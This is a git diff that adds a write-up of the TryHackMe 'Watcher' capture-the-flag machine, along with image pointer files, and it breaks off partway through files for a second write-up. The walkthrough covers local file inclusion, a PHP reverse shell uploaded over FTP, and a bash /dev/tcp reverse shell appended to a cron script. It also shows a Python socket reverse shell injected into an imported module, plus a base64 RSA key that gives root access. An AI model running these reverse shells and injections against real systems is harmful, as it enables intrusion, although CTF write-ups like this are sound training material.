diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp new file mode 100644 index 0000000..956292f --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9921783a3a3d05ff7e8f1795a879ba2d69cda35f7ec3fa142445854f12166185 +size 38436 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.png b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png new file mode 100644 index 0000000..b668edd --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c05e13a8806a6e7ddd69b7ad05119993bb36acec7d5812b306207a941a4ef87d +size 14191 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp new file mode 100644 index 0000000..d9d655d --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aaf38f2520ba12e21fd904c02c1dad990672edc6a8f2c5e7d6888e59ae499bda +size 13826 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.png b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png new file mode 100644 index 0000000..87cd61a --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d691649eb5701e6f7b65396d39b6965c0a32677de82f809229c33b6bba665329 +size 25007 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp new file mode 100644 index 0000000..65866aa --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82ecd66308978a2daee30bb87db92bea52e8c9f53997dfeb98088ddb99a862a8 +size 20096 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.png b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png new file mode 100644 index 0000000..3c04dab --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d493080f655fd019add90db93d06d252991b18855188c841feba2d5f4fe8da5f +size 40873 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp new file mode 100644 index 0000000..0590d95 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1dad2a4bacb8eb056bf9f47a89e6b445c3faba35e5e5697975433c96fb33b83d +size 41934 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.png b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png new file mode 100644 index 0000000..4cafb20 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73737325efbd8d8167d490448befbccd41033665894faf5805cdb3a80cc31a07 +size 63804 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp new file mode 100644 index 0000000..bb27a99 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06e4828cb3c654560bb6dbef36f1083f95e7100fc684167dc2eec7029b827952 +size 51490 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.png b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png new file mode 100644 index 0000000..fd066e2 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73790ede23d7ac69f63ed97d187fa5d6c1b640cb980682629a07aab55082769c +size 122626 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp new file mode 100644 index 0000000..320fee0 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:866b7ec7b2a1164c4e875c5f38594d7f9c672d7d3834e8d3947cb897bca0f857 +size 106746 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.png b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png new file mode 100644 index 0000000..466244c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b54d59b3bc362ae368be87eba118647b4570648396e62d0187567ab33b846190 +size 25724 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp new file mode 100644 index 0000000..86780a7 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7787e4eaf5160656d2887fbaaf9b15e20d80af5dfa468fe9df28a6236a114d6 +size 25334 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.png b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png new file mode 100644 index 0000000..235ca56 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3df4bbeb70d56b24372a6ae2d05841925172010f6caea40d891a3a3d71daf67 +size 29595 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp new file mode 100644 index 0000000..6bc30e6 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7d4216a853b74d32aaadcc54b3ef69e1d0c5a0109f988bc2d0467481fc3953c +size 24612 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.png b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png new file mode 100644 index 0000000..7690e7c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72c1eb5c7d5aa3bc08be1e689c8ce403929a5baa4055c6c18601271664ee147c +size 33149 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp new file mode 100644 index 0000000..205e76f --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:756776911e19502142abfe1b9428d7377b7be8100858cd480764160ee3cfb923 +size 28508 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.png b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png new file mode 100644 index 0000000..6c0694d --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc87f824b7ac23ca4dca42b57fc70b25572be35933ef62df0d63d4f458e971d5 +size 19059 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp new file mode 100644 index 0000000..97dad08 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c492d33a4b529b85e97d8859e315bb5028690cdef7811ffd30497b8c59e1c922 +size 30040 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.png b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png new file mode 100644 index 0000000..ebd7325 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88070f283adbfc40b764e58df824e7716476bdfba85a4aa413e403952d4b8200 +size 16042 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp new file mode 100644 index 0000000..e8c9a85 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6455518ff1592fcf4f6db8f61da431bc1e97bd0191d57a8dd9a005fc8a0a32d +size 18780 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.png b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png new file mode 100644 index 0000000..4983344 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0243b3fc1cbcdf63f2449a7a1139151070b4e76aa903b6d65842e1332df0669 +size 17271 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp new file mode 100644 index 0000000..3b7e2da --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6e04852f4309d777558bba6a0bb065688fb4ca612145724765eae4149b5acb10 +size 19338 diff --git a/content/writeup-ctf/writeup-watcher-thm/index.md b/content/writeup-ctf/writeup-watcher-thm/index.md new file mode 100644 index 0000000..547852f --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/index.md 
@@ -0,0 +1,341 @@ +--- +title: "Writeup - Watcher (THM)" +date: 2022-04-02 +slug: "writeup-watcher-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Watcher](https://tryhackme.com/room/watcher) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.91.35 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 21/tcp : FTP (vsftpd 3.0.3) +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.29) + +## Flag 1 - robots.txt + +At first I start by listing the pages of the website. + +![](img/image-2.webp) + +The `robots.txt` page catches my attention, so I go to it and find the following content: + + +```bash +User-agent: * +Allow: /flag_1.txt +Allow: /secret_file_do_not_read.txt +``` +So we learn the existence of 2 pages, the first is accessible and gives us the first flag : + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ curl http://10.10.91.35/flag_1.txt +FLAG{robots_dot_text_what_is_next} +``` +The second one is unfortunately not available at the moment. + +## Flag 2 - ftpuser + +After some research, I find that the page `post.php` has a `post` argument that allows to change the article. By trying a simple injection I can access the contents of a file that I know exists on the remote machine: + + +```bash +http://10.10.91.35/post.php?post=/etc/passwd +``` +![](img/image-3.webp) + +I will be able to see the content of the page previously found: + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ curl http://10.10.91.35/post.php?post=secret_file_do_not_read.txt +[...] + Hi Mat, + +The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files. + +Will + +---------- + +ftpuser:givemefiles777 +[...] +``` +We learn that the credentials of the FTP server are: `ftpuser:givemefiles777`. 
So I can connect and list the files: + +![](img/image-4.webp) + +I find the file of the second one, I download it and I display it: + + +```bash +┌──(d3vyce㉿kali)-[~] +└─$ cat flag_2.txt +FLAG{ftp_you_and_me} +``` +## Flag 3 - www-data + +In addition to the reading rights, the FTP access allows me to send files. So I create a PHP reverse shell, then I upload it on the server. + +![](img/image-5.webp) + +I launch the script by accessing the following URL: + + +```bash +10.10.91.35/post.php?post=/home/ftpuser/ftp/files/reverse.php +``` +![](img/image-6.webp) + +I now have a reverse shell, I look for the third flag with the following command: + + +```bash +$ find / -name flag_3.txt 2>/dev/null +/var/www/html/more_secrets_a9f10a/flag_3.txt +$ cat /var/www/html/more_secrets_a9f10a/flag_3.txt +FLAG{lfi_what_a_guy} +``` +## Flag 4 - toby + +Using the same command as above I find that the fourth flag is in the user `toby` folder. So I will have to find a way to change the user. + +![](img/image-7.webp) + +Looking at the sudo permissions I have with my current user, I find that I can run any command as `toby`. + + +```bash +$ sudo -l +Matching Defaults entries for www-data on watcher: + env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin + +User www-data may run the following commands on watcher: + (toby) NOPASSWD: ALL +``` +So I create a shell with the following command: + + +```bash +sudo -u toby /bin/sh +``` +I can now recover the fourth flag. + + +```bash +toby@watcher:/home$ cat toby/flag_4.txt +cat toby/flag_4.txt +FLAG{chad_lifestyle} +``` +## Flag 5 - mat + +After searching for the fifth flag I find that it is in the personal file of `mat`. + +But I also find 2 files in the personal folder of my current user: + + +```bash +$ cat toby/note.txt +Hi Toby, + +I've got the cron jobs set up now so don't worry about getting that done. 
+ +Mat +$ cat toby/jobs/cow.sh +#!/bin/bash +cp /home/mat/cow.jpg /tmp/cow.jpg +``` +I then discover that the `cow.sh` script is executed every minute by the `mat` user. + + +```bash +toby@watcher:/home$ cat /etc/crontab +cat /etc/crontab +# /etc/crontab: system-wide crontab +[...] +*/1 * * * * mat /home/toby/jobs/cow.sh +``` +Knowing that I can modify the content of this script, I add a reverse shell to the file with the following command: + + +```bash +echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> toby/jobs/cow.sh +``` +I now have a reverse shell as a `mat`: + +![](img/image-8.webp) + +And I can get the fifth flag back: + + +```bash +mat@watcher:~$ cat flag_5.txt +cat flag_5.txt +FLAG{live_by_the_cow_die_by_the_cow} +``` +## Flag 6 - will + +After searching for the sixth flag I find that it is in `will` personnel file. + +But I also find 1 file in the personal folder of my current user: + + +```bash +mat@watcher:~$ cat note.txt +cat note.txt +Hi Mat, + +I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe. + +Will +``` +Looking at my sudo permissions, I discover that I can run the `will_scirpt.py` script as `will`. 
+ +![](img/image-9.webp) + +By looking at the functioning of the script I discover that it is in two parts: + + +```bash +mat@watcher:~$ cat scripts/will_script.py +cat scripts/will_script.py +import os +import sys +from cmd import get_command + +cmd = get_command(sys.argv[1]) + +whitelist = ["ls -lah", "id", "cat /etc/passwd"] + +if cmd not in whitelist: + print("Invalid command!") + exit() + +os.system(cmd) + +------------------------------------------ + +mat@watcher:~$ cat scripts/cmd.py +cat scripts/cmd.py +def get_command(num): + if(num == "1"): + return "ls -lah" + if(num == "2"): + return "id" + if(num == "3"): + return "cat /etc/passwd" +``` +And interestingly the second part of the script is editable by my user: + + +```bash +mat@watcher:~$ ls -la scripts +ls -la scripts +total 16 +drwxrwxr-x 2 will will 4096 Dec 3 2020 . +drwxr-xr-x 6 mat mat 4096 Dec 3 2020 .. +-rw-r--r-- 1 mat mat 133 Dec 3 2020 cmd.py +-rw-r--r-- 1 will will 208 Dec 3 2020 will_script.py +``` +So I add a python reverse shell at the beginning of the file. + + +```bash +echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.3.186",3456));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") + +def get_command(num): + if(num == "1"): + return "ls -lah" + if(num == "2"): + return "id" + if(num == "3"): + return "cat /etc/passwd"' > scripts/cmd.py +``` +Then I run the script with the following command: + + +```bash +sudo -u will /usr/bin/python3 /home/mat/scripts/will_script.py 1 +``` +I now have a reverse shell as a `will`. + +![](img/image-10.webp) + +And I can get the sixth flag back. + + +```bash +will@watcher:/home/will$ cat flag_6.txt +cat flag_6.txt +FLAG{but_i_thought_my_script_was_secure} +``` +## Flag 7 - root + +When I try to find the seventh flag with the same method as for the previous ones, I can't find anything... It must be the root flag! 
+ +I first use [linPeas](https://linpeas.sh) to try to find a way to do an elevation of privilege. After a few minutes of analysis of the result of the command. I find a strange file belonging to the root user but readable by my user : + +![](img/image-11.webp) + +I retrieve its contents and then decrypt it with the `base64` command. + + +```bash +will@watcher:/home/will$ cat /opt/backups/key.b64 +cat /opt/backups/key.b64 +LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx +OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh +WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45 +ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu +TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ +T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw +bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR +QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3 +YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H +VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR +cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5 +cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3 +c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS +QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO +dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI +UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2 +TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB +QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ +TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj +dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz 
+K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu +U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw +NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 +TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD +WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 +bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 +NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG +bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 +STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t +LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo= +``` +This is an `id_rsa`! Certainly the one of the root user. So I add the permissions to the file, then I launch an SSH session: + +![](img/image-12.webp) + +I now have a `root` reserse shell and I can recover the last flag. + + +```bash +root@watcher:~# cat flag_7.txt +FLAG{who_watches_the_watchers} +``` diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.png b/content/writeup-ctf/writeup-wekor-thm/featured.png new file mode 100644 index 0000000..51dbe5c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5df83f38579999ce37f4c9c8a07349c6035af98a69df888e5a3715dd3d4a5f9 +size 184087 diff --git a/content/writeup-ctf/writeup-wekor-thm/featured.webp b/content/writeup-ctf/writeup-wekor-thm/featured.webp new file mode 100644 index 0000000..e395d1c --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c52d60524837f1484f9e0812f7426813ebab23341876b4af47b5f32db24e9884 +size 112458 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.png b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png new file mode 100644 index 0000000..9ea947d --- /dev/null 
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14afe59a7e5bf8fbf46e7486f676ab17dcd8da8110962ad5ce38ee3c1e83de90 +size 28343 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp new file mode 100644 index 0000000..665379d --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5acc27aea2c913c17f8c3d3c849e50275f46f8001fd5b862e9457a560c8092b5 +size 24082 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.png b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png new file mode 100644 index 0000000..152b118 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:164ba22dc9832e403c424b153975946873d3ac0bc6fafe56bb3341a3b88e504e +size 19825 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp new file mode 100644 index 0000000..0c8b308 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9e84d213b03026626077fb1117bb7c6b7d3bb80bac7aa029be299f2fad77eb0 +size 17514 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.png b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png new file mode 100644 index 0000000..74f43ad --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c4cd49f8324492627b7c6d200df3d1ec12f74f7fe800fe870d23604856d7bddf +size 18533 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp new file mode 100644 index 0000000..c2c72f2 --- /dev/null 
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08c26ba6f6cadfb75ce95d38ba1015f6c696571db38d4337319f87010187a43 +size 24508 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.png b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png new file mode 100644 index 0000000..1a32652 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4874bf2ffe81e7c122c84fb2813d198e4b4f332b4381b8eb00b750a7add0539e +size 33414 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp new file mode 100644 index 0000000..dc189b7 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd747ca9e69019d494bb79b3a5671eb3284ccf0ab943e616874b85ac4a5c0fb +size 41824 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.png b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png new file mode 100644 index 0000000..ce7f6b5 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7337fdce830c8f06000d3731f67e3eadbd52d88b4e4e81a13b1b6eb879682986 +size 57670 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp new file mode 100644 index 0000000..8cea94b --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3eda63a441ea7236a24d3bb845e9d3823839aed34c589ec5019c6e64e3e87c5c +size 51028 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.png b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png new file mode 100644 index 0000000..761d496 --- /dev/null 
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbb086665dd2e3812d33c8a6c217d24958be110257fb60f7285d18f27bd197d4 +size 653719 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp new file mode 100644 index 0000000..5a05fcf --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d2e50f29e4cf4e154208060b055b19acceb45552ed2af2b7963c23bffb912d7 +size 82778 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.png b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png new file mode 100644 index 0000000..97bada3 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a29b17a6a8dc413211bdef298c231f4974ef66e950a40304808ba23623639f5 +size 45596 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp new file mode 100644 index 0000000..0e3c984 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec61996217d9dc59d7d8f48f20f919ff59b28ece44e7798626b455b860c468a0 +size 42818 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.png b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png new file mode 100644 index 0000000..8ba2e63 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab43a2a38df07938b6c2c26a909e819b367a15dcd7254011e284c8e48525b587 +size 58688 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp new file mode 100644 index 0000000..a65300e --- /dev/null 
+++ b/content/writeup-ctf/writeup-wekor-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e8fca1016793473db9361d5957499b0307ca3d9a76c571e5022fb9622e40abe +size 50654 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.png b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png new file mode 100644 index 0000000..a06daa3 --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7413101302c8913152020b1fc4a993db5376e89586c5235d4ea538438df68c8 +size 74642 diff --git a/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp new file mode 100644 index 0000000..2df6c0f --- /dev/null +++ b/content/writeup-ctf/writeup-wekor-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 